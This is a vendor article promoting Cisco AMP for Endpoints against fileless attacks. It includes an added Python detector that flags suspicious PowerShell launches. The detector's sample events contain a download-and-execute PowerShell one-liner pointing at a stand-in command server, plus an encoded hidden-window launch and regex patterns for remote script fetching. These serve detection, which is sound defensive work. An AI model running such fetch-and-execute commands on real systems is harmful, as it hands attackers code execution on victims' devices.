Almost half of the new generation of malware attacks cannot be stopped by the traditional protection solutions used on mobile devices. This is the conclusion of analysts at the Enterprise Security Group (ESG), and the causes are detailed below. To make them concrete, we start with a practical case:
One of your employees receives and opens – on a laptop, tablet, or smartphone – a mail that appears to come from a legitimate sender. The mail contains a link to a site that the employee visits without knowing that it automatically loads and exploits an Adobe Flash vulnerability. The exploit, in turn, launches Windows PowerShell, which runs scripts sent by a command and control server. Final result: the attackers take control of the device in use.
The above example is the typical scenario of a Fileless Attack, which in 2017 accounted for 77% of the attacks on companies. In 2018, the Fileless technique has begun to be used frequently in attacks that combine several types of threats.
The problem is that such an attack cannot be detected and blocked by classical protection solutions – such as antivirus – for the following reasons:
- Fileless attacks run entirely in RAM;
- They use common applications that are considered safe (Web browsers, Microsoft Office, Adobe Reader, etc.);
- The attacks do not leave enough “traces” for the AV solutions to detect a malware signature. (The reason why they are called “Zero footprint” or “Non-malware” attacks.)
So what can you do?
Datanet Systems specialists’ response to this type of threat is Cisco Advanced Malware Protection (AMP) for Endpoints. The Cisco solution acts on three levels in the case of a Fileless attack:
- Prevents critical situations – AMP for Endpoints automatically identifies and alerts on vulnerabilities in the applications installed on mobile devices, prioritizing them based on Common Vulnerabilities and Exposures (CVE) classification, which gives administrators a clear record of the terminals and applications that need patches and updates.
- Detects the attack – Cisco continually monitors device activity in order to identify and block abnormal behavior of running programs. In addition, by using Cognitive Threat Analytics technology, it detects devices affected by new-generation attacks by correlating user-generated traffic data. Another inherent advantage of the solution is visibility extended to the command line level, which allows administrators to determine whether legitimate applications (such as Windows utilities) are being used for other purposes. (AMP for Endpoints can detect changes to Access Control Lists, unlawful uses of PowerShell, etc.)
- Removes the threat – Once a potential risk has been detected in the applications or processes of the operating system, the embedded Exploit Prevention technology changes the layout of process memory even before the attack begins. When an attack is effectively blocked, Cisco closes the affected application and/or process and loads contextual log data into AMP for Endpoints, so that administrators and end users know exactly where and how the attack occurred.
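The command-line visibility described above can be illustrated with a small triage routine. This is an added example, not Cisco’s code or AMP’s detection logic: it scores constructed process-creation events (parent image, child image, command line) for the pattern in the practical case, PowerShell spawned by a user-facing application with flags that point to in-memory or network-delivered script execution. The parent list, patterns and threshold are hypothetical choices for illustration.

```python
import re

# Constructed sample events (not real AMP output): (parent image, child image, command line).
SAMPLE_EVENTS = [
    ("chrome.exe", "powershell.exe",
     "powershell.exe -NoP -W Hidden -EncodedCommand <base64 omitted>"),
    ("explorer.exe", "powershell.exe",
     "powershell.exe -File C:\\Scripts\\backup.ps1"),
    ("winword.exe", "powershell.exe",
     "powershell.exe -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/')\""),
    ("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# Applications the article calls "considered safe"; a shell spawned by them is unusual (hypothetical list).
USER_FACING_PARENTS = {
    "chrome.exe", "firefox.exe", "iexplore.exe", "winword.exe",
    "excel.exe", "outlook.exe", "acrord32.exe",
}

# Command-line fragments that indicate script content arriving from memory or the network
# rather than from a script file on disk (the "zero footprint" property). Hypothetical rule set.
SUSPICIOUS_FLAGS = [
    r"-e(nc(odedcommand)?)?\b",          # -e / -enc / -EncodedCommand
    r"-w(indowstyle)?\s+hidden",         # hidden window
    r"\bIEX\b|Invoke-Expression",        # evaluate a string as code
    r"DownloadString|DownloadFile|Net\.WebClient",  # fetch content from a remote server
    r"-nop\b|-noprofile",                # skip profile (common in scripted launches)
]


def score_event(parent, child, cmdline):
    """Return (score, reasons) for one process-creation event; each matched rule adds one point."""
    reasons = []
    if child.lower() == "powershell.exe" and parent.lower() in USER_FACING_PARENTS:
        reasons.append(f"powershell spawned by user-facing application {parent}")
    for pattern in SUSPICIOUS_FLAGS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            reasons.append(f"command line matches {pattern!r}")
    return len(reasons), reasons


def triage(events, threshold=2):
    """Return the events whose score reaches the threshold, with their reasons, for analyst review."""
    flagged = []
    for parent, child, cmdline in events:
        score, reasons = score_event(parent, child, cmdline)
        if score >= threshold:
            flagged.append((parent, child, cmdline, reasons))
    return flagged


if __name__ == "__main__":
    for parent, child, cmdline, reasons in triage(SAMPLE_EVENTS):
        print(f"{parent} -> {child}: {cmdline}\n    " + "\n    ".join(reasons))
```

A single matched rule (such as an administrator’s scheduled `-NoProfile` run) stays below the threshold; it is the combination of an unexpected parent and in-memory execution flags that is raised.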
Significant coverage increase
Cisco’s solution, however, has a much broader range of coverage, integrating advanced detection and protection technologies (other than antivirus) such as:
- File reputation, with the help of which malware threats are quickly recognized and placed in quarantine without any scanning process consuming equipment resources;
- Identification of polymorphic threats – the solution analyzes the “fingerprints” of the files with risk potential, to detect possible similarities with known malware families;
- Machine Learning – AMP for Endpoints is “trained” by specific algorithms to learn how to identify files and activities with risk potential based on known malware attributes;
- Indicators of Compromise – The Cisco Talos Center continuously analyzes malware by building dynamic behavioral patterns of Indicators of Compromise (IoCs) that can quickly detect any new threats. Administrators can write their own customized IoCs (in OpenIOC format) to be used in incidents;
- “Low prevalence” analysis – Cisco automatically identifies executables with low presence across terminal equipment (which may be targeted malware or Advanced Persistent Threats) and analyzes their behavior in its own sandbox application to identify unknown threats.
Responses are swift
Another major advantage of AMP for Endpoints is that it delivers actionable information that ensures a quick response to threats and event prioritization. In addition, file trajectory and device trajectory enable administrators to identify the entry point and how malware propagates.
Similarly, suspicious file behavior can be analyzed in a secure sandbox environment (delivered in the cloud via Cisco Threat Grid), which provides detailed information. AMP for Endpoints correlates this information with data about new threats and, based on the result, can automatically quarantine a file when it begins to behave abnormally.
Analyses confirm the level of performance
The Cisco solution is named a leader in the IDC Endpoint Security MarketScape, and version 6.0.5 received an NSS Labs recommendation last year. AMP for Endpoints achieved very good results in the Advanced Endpoint Protection tests (100% blocking of HTTP threats, 99.4% of email threats, 100% of document and script threats, etc.), with a total effectiveness of 94.7%.
What more can you do?
Datanet specialists can help you expand the protection of mobile users by integrating AMP for Endpoints with other solutions from the Cisco portfolio. One example is Identity Services Engine (ISE), which can restrict network access by quarantining a device when AMP for Endpoints detects that it is compromised. In addition, Cisco Umbrella works as a first line of defense against threats, blocking terminal access to compromised IP addresses, URLs and domains, while the AnyConnect Mobility Solution secures mobile connections to corporate networks. AMP for Endpoints also integrates with applications from other vendors; Datanet specialists can help you integrate it with solutions such as Splunk SIEM, Swimlane Security Operations Manager, IBM QRadar, LogRhythm Security Intelligence Platform, etc.
If you want to learn more about how Cisco AMP for Endpoints and Datanet Systems specialists can help you improve mobile protection, please contact us at email@example.com